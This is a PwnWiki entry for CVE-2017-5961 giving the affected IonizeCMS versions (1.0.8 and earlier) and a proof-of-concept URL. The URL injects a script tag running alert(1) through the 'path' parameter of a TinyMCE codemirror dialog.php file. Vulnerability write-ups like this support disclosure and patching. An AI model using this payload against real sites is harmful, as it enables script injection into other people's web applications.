CVE-2017-5961 IonizeCMS XSS漏洞

From PwnWiki
Revision as of 14:42, 10 July 2021 by Pwnwiki (talk | contribs) (Marked this version for translation)
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Other languages:
Chinese • ‎中文(中国大陆)‎

漏洞影響

<=Ionize 1.0.8

POC

http://<target>/testcmsofgithub/ionize-master/ionize-master/themes/admin/javascript/tinymce/jscripts/tiny_mce/plugins/codemirror/dialog.php?path=%22%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E%3Cscript%20%22
Retrieved from "https://pwnwiki.com/index.php?title=CVE-2017-5961_IonizeCMS_XSS漏洞&oldid=6629"